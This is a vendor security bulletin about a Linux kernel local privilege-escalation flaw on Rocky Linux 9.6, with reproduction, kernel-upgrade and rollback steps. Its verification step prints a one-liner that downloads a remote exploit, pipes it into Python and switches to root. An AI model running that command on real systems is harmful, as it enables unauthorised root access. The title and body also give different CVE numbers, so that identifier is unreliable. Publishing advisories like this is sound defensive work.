首页
关于海比
海比简介
发展历程
荣誉资质
人才招聘
最新动态
公司动态
行业新闻
项目案例
招标中心
系统更新
产品中心
流媒体系统
视频录播
信息发布
内容生产
智联云屏
解决方案
智慧教育
智慧医疗
智慧编创
智慧运营
联系我们
全国服务热线 139-0515-9393
NEWS

最新动态

当前位置:首页 - 最新动态 - 系统更新

【高】操作系统 Rocky操作系统(CVE-2026-3143)

发表时间:2026-04-21 浏览: 作者: 返回列表

涉及到IHAIBI/海比 所有系统:包含不限于视频点播系统、视频直播系统、视频录播系统、信息发布系统等流媒体系统与应用产品。如需升级,请联系IHAIBI/海比售后客服。



适用于
Rocky操作系统,系统版本为9.6+
内核版本大于4.14 ,如果是升级,可以直接跳过复现步骤。另外,漏洞验证过程是在测试环境,未有相关业务系统在运行。建议生产进行处置的过程中,采用逐步分阶段执行,优先从非重要业务系统开始,留有相关观察周期。

 

1、漏洞描述

CVE-2026-31431(又称 Copy Fail)是 Linux 内核 crypto 子系统中的一个高危本地提权漏洞,问题位于 algif_aead 模块,即内核 userspace crypto API AEAD socket 接口(AF_ALG)。该漏洞可通过 AF_ALG + splice() 影响内核 page cache,攻击者在已能于节点上执行用户态代码的前提下,可能进一步提权至节点 root,或产生跨容器影响(同一宿主机上的进程共享内核 page cache)。Linux kernel 社区对该漏洞的修复描述为:crypto: algif_aead - Revert to operating out-of-place

2、漏洞复现

1、查看操作系统的内核版本信息

Plain Text
[jsber@qmt ~]$ uname -r
5.14.0-570.17.1.el9_6.x86_64

2、漏洞验证

服务器能够访问外网的情况下,直接使用在线验证脚本:curl https://copy.fail/exp | python3.12 && su , 然后使用 id 命令,可以看到系统权限为root,能够完成提权操作。具体结果如下图:

image.png

 

注意点:这个测试脚本验证脚本使用环境是python 3.10 + Rocky 9.6默认的python环境为3.9,所以需要部署python高版本环境,如下是相关编译安装python的步骤仅供参考:

Shell
# 离线环境:提前下载所有依赖包,上传后批量安装
cd /usr/local/src
wget https://mirrors.tuna.tsinghua.edu.cn/python/3.12.3/Python-3.12.3.tgz
tar -xzf Python-3.12.3.tgz
cd Python-3.12.3

# 配置(启用优化,不覆盖系统Python)
./configure --enable-optimizations --prefix=/usr/local/python3.12

# 编译(用所有CPU核心加速,约10-20分钟)
make -j $(nproc)

# 安装(altinstall 不覆盖系统默认python3)
make altinstall

ln -sf /usr/local/python3.12/bin/python3.12 /usr/bin/python3.12
ln -sf /usr/local/python3.12/bin/pip3.12 /usr/bin/pip3.12

python3.12 --version
pip3.12 --version

 

3、升级内核措施

由于Rocky内核直接编译了该存在漏洞的模块,没有办法卸载相关的模块。故需要直接升级内核。


image.png

 

下载相关资源包:

https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-5.14.0-611.54.1.el9_7.x86_64.rpm

https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpm

https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpm

https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpm

 

 

1、下载好相关的包文件,或者不适用wget,使用我提供的压缩包文件。然后再进行rpm安装

Bash
# 安装相关下载的内核包:
mkdir /root/kernel-rpm  
cd /root/kernel-rpm

wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-5.14.0-611.54.1.el9_7.x86_64.rpm
wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpm
wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpm
wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpm
wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-tools-libs-5.14.0-611.54.1.el9_7.x86_64.rpm
wget https://mirrors.aliyun.com/rockylinux/9/BaseOS/x86_64/os/Packages/k/kernel-tools-5.14.0-611.54.1.el9_7.x86_64.rpm

rpm -ivh \
kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64.rpm \
kernel-core-5.14.0-611.54.1.el9_7.x86_64.rpm \
kernel-modules-5.14.0-611.54.1.el9_7.x86_64.rpm \
kernel-5.14.0-611.54.1.el9_7.x86_64.rpm

 

2、验证相关内核文件的安装情况

Shell

[root@qmt kernel-rpm]# rpm -qa | grep kernel | sort
kernel-5.14.0-570.17.1.el9_6.x86_64
kernel-5.14.0-611.54.1.el9_7.x86_64
kernel-core-5.14.0-570.17.1.el9_6.x86_64
kernel-core-5.14.0-611.54.1.el9_7.x86_64
kernel-headers-5.14.0-570.30.1.el9_6.x86_64
kernel-modules-5.14.0-570.17.1.el9_6.x86_64
kernel-modules-5.14.0-611.54.1.el9_7.x86_64
kernel-modules-core-5.14.0-570.17.1.el9_6.x86_64
kernel-modules-core-5.14.0-611.54.1.el9_7.x86_64
kernel-srpm-macros-1.0-13.el9.noarch
kernel-tools-5.14.0-570.17.1.el9_6.x86_64
kernel-tools-libs-5.14.0-570.17.1.el9_6.x86_64

3、列出系统启动分区/boot下的所有内核可执行启动镜像,验证新内核的启动文件是否正确生成并放入启动分区

Bash
# 列出系统启动分区/boot下的所有内核可执行启动镜像,验证新内核的启动文件是否正确生成并放入启动分区
ls -l /boot/vmlinuz-*
-rwxr-xr-x. 1 root root 14916424 Aug  7  2025 /boot/vmlinuz-0-rescue-db0960be52c24c74aa19825dfdd7b692
-rwxr-xr-x. 1 root root 14916424 May 24  2025 /boot/vmlinuz-5.14.0-570.17.1.el9_6.x86_64
-rwxr-xr-x  1 root root 15117128 May  6 01:28 /boot/vmlinuz-5.14.0-611.54.1.el9_7.x86_64

4、检查新内核对应的initramfs临时根文件系统镜像是否存在,这个文件是新内核能正常启动的必备文件

Bash
ls -l /boot/initramfs-5.14.0-611.54.1.el9_7.x86_64.img

5、为新内核手动生成启动必需的initramfs镜像,解决镜像缺失的问题,保证新内核能正常引导启动

Bash
dracut -f /boot/initramfs-5.14.0-611.54.1.el9_7.x86_64.img 5.14.0-611.54.1.el9_7.x86_64

6、重启操作系统systemctl reboot ,再次查看内核版本:

image.png 

以上就完成了内核升级。

4、回退措施

1、查看当前系统中的内核:

Shell
[root@qmt jsber]# ls -l /boot/loader/entries/
total 12
-rw-r--r--. 1 root root 466 Aug  7  2025 db0960be52c24c74aa19825dfdd7b692-0-rescue.conf
-rw-r--r--. 1 root root 414 Aug  7  2025 db0960be52c24c74aa19825dfdd7b692-5.14.0-570.17.1.el9_6.x86_64.conf
-rw-r--r--  1 root root 413 May  9 16:27 db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf

可以看到返回的两个:

新版本内核: db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64

旧版本内核: db0960be52c24c74aa19825dfdd7b692-5.14.0-570.17.1.el9_6.x86_64

 

2、备份新版本内核之后,再删除新版本内核

Shell
[root@qmt jsber]# cp /boot/loader/entries/db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf /root/

[root@qmt jsber]# rm -f /boot/loader/entries/db0960be52c24c74aa19825dfdd7b692-5.14.0-611.54.1.el9_7.x86_64.conf

3、更新 GRUB 配置并重启

Shell
[root@qmt jsber]# grub2-mkconfig -o /boot/grub2/grub.cfg

# 安全重启
[root@qmt jsber]# systemctl reboot

4、重启之后再次查看版本引用:

Shell
[jsber@qmt ~]$ uname -r
5.14.0-570.17.1.el9_6.x86_64

 涉及IHAIBI/海比 全系列产品。